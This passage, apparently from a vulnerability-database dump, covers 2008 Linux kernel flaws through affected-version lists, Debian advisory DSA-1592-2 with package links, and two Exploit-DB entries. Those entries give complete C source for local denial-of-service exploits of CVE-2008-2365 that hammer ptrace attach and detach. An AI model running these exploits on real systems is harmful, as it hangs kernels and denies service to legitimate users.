2.4.33 .3\r\nLinux kernel 2.4.33 -pre1\r\nLinux kernel 2.4.33\r\nLinux kernel 2.4.33\r\nLinux kernel 2.4.32 -pre2\r\nLinux kernel 2.4.32 -pre1\r\nLinux kernel 2.4.32\r\nLinux kernel 2.4.31 -pre1\r\nLinux kernel 2.4.31\r\nLinux kernel 2.4.30 rc3\r\nLinux kernel 2.4.30 rc2\r\nLinux kernel 2.4.30\r\nLinux kernel 2.4.29 -rc2\r\nLinux kernel 2.4.29 -rc1\r\nLinux kernel 2.4.29\r\nLinux kernel 2.4.28\r\nLinux kernel 2.4.27 -pre5\r\nLinux kernel 2.4.27 -pre4\r\nLinux kernel 2.4.27 -pre3\r\nLinux kernel 2.4.27 -pre2\r\nLinux kernel 2.4.27 -pre1\r\nLinux kernel 2.4.27\r\nLinux kernel 2.4.26\r\nLinux kernel 2.4.25\r\nLinux kernel 2.4.24 -ow1\r\nLinux kernel 2.4.24\r\nLinux kernel 2.4.23 -pre9\r\nLinux kernel 2.4.23 -ow2\r\nLinux kernel 2.4.23\r\nLinux kernel 2.4.22\r\nLinux kernel 2.4.21 pre7\r\nLinux kernel 2.4.21 pre4\r\nLinux kernel 2.4.21 pre1\r\nLinux kernel 2.4.21\r\n+ Conectiva Linux 9.0\r\n+ MandrakeSoft Linux Mandrake 9.1 ppc\r\n+ MandrakeSoft Linux Mandrake 9.1\r\n+ RedHat Desktop 3.0\r\n+ RedHat Enterprise Linux AS 3\r\n+ RedHat Enterprise Linux ES 3\r\n+ RedHat Enterprise Linux WS 3\r\n+ S.u.S.E. Linux Enterprise Server 8\r\n+ S.u.S.E. Linux Personal 9.0 x86_64\r\n+ S.u.S.E. Linux Personal 9.0\r\nLinux kernel 2.4.20\r\nLinux kernel 2.4.19 -pre6\r\nLinux kernel 2.4.19 -pre5\r\nLinux kernel 2.4.19 -pre4\r\nLinux kernel 2.4.19 -pre3\r\nLinux kernel 2.4.19 -pre2\r\nLinux kernel 2.4.19 -pre1\r\nLinux kernel 2.4.19\r\nLinux kernel 2.4.18 pre-8\r\nLinux kernel 2.4.18 pre-7\r\nLinux kernel 2.4.18 pre-6\r\nLinux kernel 2.4.18 pre-5\r\nLinux kernel 2.4.18 pre-4\r\nLinux kernel 2.4.18 pre-3\r\nLinux kernel 2.4.18 pre-2\r\nLinux kernel 2.4.18 pre-1\r\nLinux kernel 2.4.18 x86\r\nLinux kernel 2.4.18\r\nLinux kernel 2.4.17\r\nLinux kernel 2.4.16\r\nLinux kernel 2.4.15\r\nLinux kernel 2.4.14\r\nLinux kernel 2.4.13\r\nLinux kernel 2.4.12\r\n+ Conectiva Linux 7.0\r\nLinux kernel 2.4.11\r\nLinux kernel 2.4.10\r\nLinux kernel 2.4.9\r\nLinux kernel 2.4.8\r\nLinux kernel 2.4.7\r\nLinux kernel 2.4.6\r\nLinux kernel 2.4.5\r\n+ Slackware Linux 8.0\r\nLinux kernel 2.4.4\r\nLinux kernel 2.4.3\r\nLinux kernel 2.4.2\r\nLinux kernel 2.4.1\r\nLinux kernel 2.4 .0-test9\r\nLinux kernel 2.4 .0-test8\r\nLinux kernel 2.4 .0-test7\r\nLinux kernel 2.4 .0-test6\r\nLinux kernel 2.4 .0-test5\r\nLinux kernel 2.4 .0-test4\r\nLinux kernel 2.4 .0-test3\r\nLinux kernel 2.4 .0-test2\r\nLinux kernel 2.4 .0-test12\r\nLinux kernel 2.4 .0-test11\r\nLinux kernel 2.4 .0-test10\r\nLinux kernel 2.4 .0-test1\r\nLinux kernel 2.4\r\nLinux kernel 2.6.8.1\r\n+ S.u.S.E. Linux Personal 9.2 x86_64\r\n+ S.u.S.E. Linux Personal 9.2\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.26-rc5-git1\r\nLinux kernel 2.6.25.4\r\nLinux kernel 2.6.25.3\r\nLinux kernel 2.6.25.2\r\nLinux kernel 2.6.25.1\r\nLinux kernel 2.6.24.6\r\nLinux kernel 2.6.24-rc2\r\nLinux kernel 2.6.24-rc1\r\nLinux kernel 2.6.23.14\r\nLinux kernel 2.6.23.10\r\nLinux kernel 2.6.23.1\r\nLinux kernel 2.6.23.09\r\nLinux kernel 2.6.22-rc7\r\nLinux kernel 2.6.22-rc1\r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\r\nLinux kernel 2.4.36.6\r\nLinux kernel 2.4.36.5\r\nLinux kernel 2.4.34.6\r\nLinux kernel 2.4.34.5\r\nLinux kernel 2.4.34.3\r\nLinux kernel 2.4.33.5\r\nLinux kernel 2.4.33.4\n \u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=http://rhn.redhat.com/errata/RHSA-2008-0508.html target=_blank>http://rhn.redhat.com/errata/RHSA-2008-0508.html</a>\r\n<a href=http://rhn.redhat.com/errata/RHSA-2008-0519.html target=_blank>http://rhn.redhat.com/errata/RHSA-2008-0519.html</a>", "published": "2008-06-29T00:00:00", "type": "seebug", "title": "Linux Kernel 32-bit/64bit\u4eff\u771f\u672c\u5730\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0598"], "modified": "2008-06-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3495", "id": "SSV:3495", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:53:05", "description": "Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (1). CVE-2008-2365. Dos exploit for linux platform", "published": "2008-06-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2365"], "modified": "2008-06-25T00:00:00", "id": "EDB-ID:31965", "href": "https://www.exploit-db.com/exploits/31965/", "sourceData": "source: http://www.securityfocus.com/bid/29945/info\r\n\r\nThe Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.\r\n\r\nAttackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. \r\n\r\n#include <stdlib.h>\r\n#include <sys/ptrace.h>\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tpid_t pid = atoi(argv[1]);\r\n\r\n\twhile (1)\r\n\t\tptrace(PTRACE_ATTACH, pid, NULL, NULL);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31965/"}, {"lastseen": "2016-02-03T15:53:13", "description": "Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (2). CVE-2008-2365. Dos exploit for linux platform", "published": "2008-06-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2365"], "modified": "2008-06-25T00:00:00", "id": "EDB-ID:31966", "href": "https://www.exploit-db.com/exploits/31966/", "sourceData": "source: http://www.securityfocus.com/bid/29945/info\r\n \r\nThe Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.\r\n \r\nAttackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. \r\n\r\n/* This software is provided 'as-is', without any express or implied\r\n warranty. In no event will the authors be held liable for any \r\ndamages\r\n arising from the use of this software.\r\n \r\n Permission is granted to anyone to use this software for any purpose,\r\n including commercial applications, and to alter it and redistribute \r\nit\r\n freely. */\r\n\r\n#ifdef __ia64__\r\n#define ia64_fpreg ia64_fpreg_DISABLE\r\n#define pt_all_user_regs pt_all_user_regs_DISABLE\r\n#endif\t/* __ia64__ */\r\n#include <sys/ptrace.h>\r\n#ifdef __ia64__\r\n#undef ia64_fpreg\r\n#undef pt_all_user_regs\r\n#endif\t/* __ia64__ */\r\n#include <linux/ptrace.h>\r\n#include <sys/types.h>\r\n#include <sys/user.h>\r\n#if defined __i386__ || defined __x86_64__\r\n#include <sys/debugreg.h>\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n#include <signal.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n/* WARNING: The real testing count is probably unbound. */\r\n#define DEFAULT_TESTTIME 10\t/* seconds */\r\n\r\nstatic pid_t pid;\r\n\r\nstatic void\r\ncleanup (void)\r\n{\r\n if (pid != 0)\r\n kill (pid, SIGKILL);\r\n}\r\n\r\nstatic void\r\nhandler_fail (int signo)\r\n{\r\n cleanup ();\r\n\r\n signal (signo, SIG_DFL);\r\n raise (signo);\r\n}\r\n\r\nstatic void *thread_func(void *argv0_pointer)\r\n{\r\n\texecl(\"/proc/self/exe\", argv0_pointer, \"child\", NULL);\r\n\tabort ();\r\n\t/* NOTREACHED */\r\n}\r\n\r\nint main(int argc, const char *argv[])\r\n{\r\n\tchar *testtime = getenv (\"TESTTIME\");\r\n\ttime_t testend = time (NULL) + (testtime != NULL ? atoi \r\n(testtime)\r\n\t\t\t\t\t\t\t : \r\nDEFAULT_TESTTIME);\r\n\tunsigned long loops;\r\n\tpthread_t thread;\r\n\r\n\tatexit (cleanup);\r\n\tsignal (SIGABRT, handler_fail);\r\n\tsignal (SIGINT, handler_fail);\r\n\r\n\tif ((argc != 2 || strcmp (argv[1], \"child\") != 0) && (pid = \r\nfork())) {\r\n\t\tloops = 0;\r\n\t\tdo {\r\n\t\t\tptrace(PTRACE_ATTACH, pid, NULL, 0);\r\n\t\t\tptrace(PTRACE_DETACH, pid, NULL, 0);\r\n\t\t\tloops++;\r\n\t\t} while (time (NULL) < testend);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif (pthread_create(&thread, NULL, thread_func, (void *) \r\nargv[0]))\r\n\t\tperror(\"pthread_create\");\r\n\r\n\twhile (1)\r\n\t\tpause();\r\n\t/* NOTREACHED */\r\n\tabort ();\r\n}\r\n\r\n", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31966/"}], "debian": [{"lastseen": "2020-11-11T13:21:42", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2358", "CVE-2008-1673"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1592-2 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nJun 09, 2008 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : heap overflow\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1673 CVE-2008-2358\n\nTwo vulnerabilities have been discovered in the Linux kernel that may\nlead to a denial of service or arbitrary code execution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2008-1673\n\n Wei Wang from McAfee reported a potential heap overflow in the\n ASN.1 decode code that is used by the SNMP NAT and CIFS\n subsystem. Exploitation of this issue may lead to arbitrary code\n execution. This issue is not believed to be exploitable with the\n pre-built kernel images provided by Debian, but it might be an\n issue for custom images built from the Debian-provided source\n package.\n\nCVE-2008-2358\n\n Brandon Edwards of McAfee Avert labs discovered an issue in the\n DCCP subsystem. Due to missing feature length checks it is possible\n to cause an overflow they may result in remote arbitrary code\n execution.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.6.18.dfsg.1-18etch6.\n\nThis updated advisory adds the linux-2.6 build for mipsel which was not\nyet available at the time of DSA-1592-1.\n\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\nuser-mode-linux packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 4.0 (etch)\n fai-kernels 1.17+etch.18etch6\n user-mode-linux 2.6.18-1um-2etch.18etch6\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.diff.gz\n Size/MD5 checksum: 5352776 53665fdbfd435768445f5769815a6f0f\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.dsc\n Size/MD5 checksum: 892 19fedcf7c50efef11cafccae07e0633e\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.dsc\n Size/MD5 checksum: 740 6d352c2fd23224c19ce6bd5f16e426a2\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.diff.gz\n Size/MD5 checksum: 17450 e69f4b95dd204d627a5f45b1912fb428\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.dsc\n Size/MD5 checksum: 5672 ad355fcc4fd43b811ea42d25e453f07b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.tar.gz\n Size/MD5 checksum: 55758 da75950eb5b906da82a0eb14e3df0a24\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\n Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 3718034 4a0772868c474a21d84a5759109fead8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 1084558 3339b6103ae3d4b978a2f793b6c7b4a4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 41461134 0b1d8c9944f19c4ab4fe6ba26149724d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 54744 21d56790fe466ad9835168c4200fc83d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 3589420 9b6d24f908606a6fb80d6ba6d5b162fd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 1594648 f724461b4b1556f3c95b76bd641d19a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 268958 9226e8f3bd1abe6e1f46d83cb3f15c3e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 3052824 0a5d73bd0f62988679f1523345a479a1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23484706 b3235616663a3f8c5cd74be1971b0426\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 54198 7ad2915af786942a1a198eb5c6d87c81\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 269130 49ffe80d6a37500df13cbb6f354843a8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23463240 395dade71f4add94b3ce97ae3cbb8bdd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 267564 2743efe9dec46be47c98cdcad485862a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 54234 5a14d927da54bc3f8b2b7c9aeb9fab08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 268502 2b7595f2a27c437625fbae0f812e8d61\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23845706 5561732b0f11d84d3b8e46f02e3975e6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23531908 3cd9327777e15186fcc3149852e73290\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 3027958 b9764577f6da5b8233db177295abd20f\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 16820986 eb574728014e9904a8b17b79d943f478\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 272278 ace4647a9cab44eba24967ea905ec511\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3357354 4a27ec48575670343f6849f073bf3fdb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 15261092 cbc252d19e9c5d54d05df350e3982d07\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 271366 1ff138c5b3b035aa0e00e01f9c4f0191\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3334544 deda30b57daf3beddb8f5761e1437c05\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3191322 1d05ad81472b0dafdfe1df5d780399fb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54220 4ecdd29baeeafc951bab081dda4e12ef\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 15272912 76bb3fe952642ad6b49ecd037b3e517d\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_amd64.deb\n Size/MD5 checksum: 5961148 cf3882acfa9f901fe84967a9593ecc18\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 1651376 bf5f3e895995733fa3083c9a07e39ea5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 271766 be91f9c886c16307775a5638cebd80c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54176 a22f888eb52a941b6c1eeb2bf4bccb78\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54196 71891fefd6ee2382962b8756df128b4a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 3167972 4ce30d9f1fad078702baaa7834775f69\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 272054 e6c044359f237eab561d4c2a65e13f70\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 1682878 0a59c60af64f405bf651dd07ad5de0f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 16859630 89749a4df4d633b398874b93ea578657\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\n Size/MD5 checksum: 54190 fe4b179dfd4c055d33503ba23bb136fb\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 203914 3854a7aceff5e5b08d7da9d9c8473eb2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 7566184 3251d12c0787ee663d41b6626fe5a19f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 7924654 72f101e8ff6000295d9a8145784225a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 239342 268018e4ccd46f7e810a47b39dc79f5b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 8871080 f9f89ad15430fa3ce924cabc61c059a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 4587380 368ad6bded347af3ecf166a638423a87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 54270 ea205cdff5f7c47808274f0742cb6601\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 3410570 4cfed14130d8e6ae01e29f43371fd267\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 54224 296297dda91d48b22b5c0792a512a9e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 234034 756b3be7a0e806fd552088567eebf9b9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 5009710 65d72981b3071d9beb5702f747c36ee5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 233278 6ae2de0c4b0a4445ac244a0c18ffb81c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\n Size/MD5 checksum: 199026 a77225b0ad44d3b76b1a713c561a362f\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 197138 d3fc247a0b6c6529c6b83f7e15199b5c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 195994 612e8e99ccd7513b0624aef50d8eb66e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 54200 437f1bd9f5228bb914af3031fd6655cc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 11804482 b24d71ea0c2766ba00365b15f5e24541\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 11399062 5723ae1069220e3b8d4907fbdf5ac10a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 10549640 3e964c1beb33196c39acec315b9c5804\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 198038 5764e6e1f0a379da2f67ab9f451d2c62\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 3021484 0616fe9a6b6a92e626d474f09a10638d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 196868 3b9dc88a935313ea464a08ad56196895\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 54230 d57f3c556d2ca6112ccbc0b627dcf83c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\n Size/MD5 checksum: 10996980 19dddbbb86a828ca3ab0898ef8c8b0cf\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 279858 24e43546a522be29a5566c59950bb32f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272272 163871c79fe7cc6f242343ae4b5e36ca\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 278466 dbe60de8028eed33bda3bd2021ccaa5f\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_i386.deb\n Size/MD5 checksum: 5504184 60937dfa6ebd60e8535ff15e4af6af0b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3170866 bd437b396223ac6fa6e995edb3964191\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54182 7374df882c4606c00b4d86bbfb0abcb0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3148682 5821e91313f3b4255fc349ed8506822b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16336816 